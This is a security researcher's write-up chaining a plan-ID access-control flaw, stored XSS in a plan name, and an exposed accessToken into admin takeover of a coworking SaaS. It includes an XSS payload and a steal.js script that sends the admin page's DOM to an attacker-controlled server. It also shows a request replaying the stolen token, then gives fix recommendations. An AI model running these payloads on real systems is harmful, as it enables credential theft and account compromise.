Deconstructing the Escalation Path: From a Benign Self-XSS to Admin Access

The Setup
There's this SaaS product I’d been testing — let’s call it WorkspaceX. It’s a platform for managing coworking spaces: bookings, memberships, internal communication, the works. Pretty well put together.
Each space gets its own subdomain, along the lines of yourspace.workspacex.com.
Admins can create membership plans with different access levels, perks, or pricing. Members can sign up to these plans through public signup forms hosted on the space’s subdomain. Nothing too out of the ordinary.
But in a multi-tenant architecture like this, even a tiny validation miss can lead to dangerous boundary breaks. And that’s exactly what happened here.
Step 1: The Harmless Self-XSS
I started by creating a new membership plan inside my own test space.
Just for fun, I set the plan name to a script-tag payload, something along the lines of <script>alert(/XSS/)</script>. I figured if this ever rendered somewhere without sanitization, it’d trigger. No expectations — just curiosity.
Then I used that plan to sign up to my own space, using the public signup form.
After submitting the form, I logged into the admin panel of my space and checked the member details.
Boom — alert(/XSS/).
Nothing groundbreaking, just self-XSS. Classic oversight: rendering unescaped user-controlled fields. Good note for later.
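To make the class of bug concrete, here’s a hypothetical rendering sketch, not WorkspaceX’s actual code. It assumes a Node/Express-style backend and an invented Member model; the point is the difference between dropping a user-controlled field straight into HTML and encoding it first.

const express = require('express');                  // assumed Node/Express-style backend
const app = express();

// Hypothetical handler for the member-details view (not WorkspaceX's actual code).
app.get('/members/:id', async (req, res) => {
  const member = await Member.findById(req.params.id);   // Member is an invented model

  // Vulnerable: the stored plan name is concatenated straight into the HTML response,
  // so a <script> tag inside it executes in the admin's browser.
  res.send(`<td class="plan">${member.planName}</td>`);
});

// Safer: HTML-encode anything user-controlled before it reaches the page.
const escapeHtml = (s) =>
  s.replace(/[&<>"']/g, (c) =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]));
// res.send(`<td class="plan">${escapeHtml(member.planName)}</td>`);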
Step 2: The Plan ID Tampering Thought
As I was reviewing the signup request, something odd stood out.
The form sends a POST request to the space’s public signup endpoint, with a body that includes:
membership_plan_id=[some-plan-id]
In theory, that membership_plan_id should be tied to the specific space you're signing up to, right?
But there was no indication of server-side validation around that plan's origin. That raised a big question:
What if I tried signing up to a different space — say, someone else’s — using a plan ID from my own space?
Step 3: The Real Exploit
So I picked another test space I had set up — a second account on the platform to act as the “victim.”
I opened the public signup form for that space, intercepted the request, and swapped the membership_plan_id value with the ID of the plan I had created earlier (the one with the XSS payload in the name).
Submitted the request.
It went through. No errors. I was in.
I had just joined my second test space using a plan from my original space — and gained full member-level access to whatever resources the plan allowed: bookings, internal pages, etc.
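For reference, the replayed request looked roughly like the sketch below. The host, the endpoint path, and the name/email fields are placeholders I’ve invented; the only detail that matters is the foreign membership_plan_id.

// Replaying the victim space's signup request with one field swapped.
// Host, path, and the name/email fields are placeholders.
fetch('https://victim-space.workspacex.com/signup', {
  method: 'POST',
  body: new URLSearchParams({
    name: 'Totally Normal Member',
    email: 'member@example.com',
    membership_plan_id: 'plan-id-from-my-own-space'   // belongs to a different tenant
  })
});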
Step 4: Weaponizing the XSS
Now back to that XSS in the plan name.
I logged into this second space as the admin and viewed the newly signed-up member in the dashboard.
The payload triggered.
Stored XSS, executed inside a privileged admin UI, on a space that didn’t own or create the malicious plan — just displayed it.
A simple alert() is just a proof of concept. What could I really get? I went back and changed the payload in my plan's name to a Blind XSS one — a script that would copy the entire page's HTML (the DOM) and send it to a server I control:
<script src="https://my-attacker-server.com/steal.js"></script>
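The script itself doesn’t need to be fancy. Here’s a minimal sketch of what a steal.js like this can look like, assuming a /collect endpoint on my server to receive the data:

// steal.js: grab the fully rendered page and ship it to the attacker's server.
// The /collect path is an assumption; any listener that logs POST bodies will do.
fetch('https://my-attacker-server.com/collect', {
  method: 'POST',
  mode: 'no-cors',                               // fire-and-forget, no response needed
  body: document.documentElement.outerHTML       // the entire DOM, tokens and all
});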
Then I logged into the second space as the admin again and viewed the newly signed-up member in the dashboard.
For a moment, nothing happened on the screen. But a second later… ping. My server lit up. I had received the complete DOM of the admin's page.
I opened the file and searched for "token". And there it was, sitting in a script tag in plain text:
<script>
window.accessToken = 'eacbb6bb95b2f891e071bc2ab9344546e615e3f7a6c050b4368093174bc0da9e';
window.locale = 'en';
window.adminSection = true;
</script>
That’s not just a session cookie. That’s a full-blown API key. Using this token, I was able to access the API directly as the space admin. The exploit just went from serious to critical.
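Concretely, the replay is a one-liner. The API host, path, and Bearer header scheme below are assumptions on my part; only the token value came from the leaked page source.

// Calling the platform's API with the stolen admin token.
// The /api/members path and Bearer scheme are assumed; the token is the leaked value.
const stolenAccessToken = 'eacbb6bb95b2f891…';        // truncated here

fetch('https://victim-space.workspacex.com/api/members', {
  headers: { Authorization: 'Bearer ' + stolenAccessToken }
})
  .then((res) => res.json())
  .then((data) => console.log(data));                 // responds as if I were the space admin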
To recap:
I signed up to someone else’s space using a plan from my own space.
The platform didn’t validate plan ownership.
My plan name, armed with a Blind XSS payload, was stored and rendered in the victim's admin dashboard.
When the admin viewed the new member, the script executed, stealing the page's source code and sending it to my server.
I found a hardcoded accessToken in that code, giving me full control of their account.
What Went Wrong
This exploit is a chain of three failures:
Access Control Logic Flaw: The server accepts foreign membership_plan_id values during signup. It doesn’t verify that the plan belongs to the space receiving the signup.
Stored XSS via Metadata Injection: The attacker-controlled plan name is stored and rendered unescaped in the victim admin’s dashboard.
Critical Sensitive Data Exposure: The application embeds a high-privilege accessToken directly into the page source, making it trivial to steal via the XSS flaw.
This breaks tenant isolation in three serious ways:
Unauthorized access to arbitrary spaces.
Persistent client-side code execution inside admin browsers.
Theft of credentials leading to full account compromise.
Impact
Full Admin Account Takeover: Steal the accessToken of any admin who simply views the malicious member in their dashboard.
Complete Workspace Compromise: Use the stolen API token to read, modify, or delete any data within the compromised workspace.
Join any space on the platform using just a valid plan ID from an attacker-controlled account.
Access member-only resources you weren’t invited to.
Fix Recommendations
Strictly validate membership_plan_id on the server — it must belong to the space receiving the signup (see the sketch after this list).
Sanitize or HTML-encode all user-controlled metadata before rendering it, especially in admin views.
Secure Token Handling: Never embed sensitive API tokens directly into the page source. Use secure, HTTP-only cookies for sessions to prevent this type of theft, as they are not accessible to JavaScript.
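Here’s a minimal sketch of the first and third fixes in Express-style pseudocode, not the platform’s actual stack. Space, MembershipPlan, createSession, and the field names are all invented; the point is the ownership check and the HTTP-only session cookie.

// Express-style sketch; Space, MembershipPlan, createSession, and field names are invented.
const express = require('express');
const app = express();
app.use(express.urlencoded({ extended: false }));     // parse the form-encoded signup body

app.post('/signup', async (req, res) => {
  const space = await Space.findBySubdomain(req.hostname);
  const plan = await MembershipPlan.findById(req.body.membership_plan_id);

  // Fix 1: reject plans that don't belong to the space receiving the signup.
  if (!plan || plan.spaceId !== space.id) {
    return res.status(403).send('Invalid membership plan for this space.');
  }

  const member = await space.addMember({ email: req.body.email, planId: plan.id });

  // Fix 3: keep the session credential in an HTTP-only cookie, out of reach of page scripts.
  const session = await createSession(member);
  res.cookie('session', session.id, { httpOnly: true, secure: true, sameSite: 'lax' });
  res.redirect('/welcome');
});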
Final Thoughts
This one started with a classic self-XSS and escalated into a full admin account takeover. The platform trusted a little too much across space boundaries, but the real catastrophe was leaving the keys to the kingdom lying on the floor. The IDOR got me in the door, but the exposed accessToken let me own the building.
Always validate ownership, but more importantly: never, ever let a secret token touch the client-side DOM.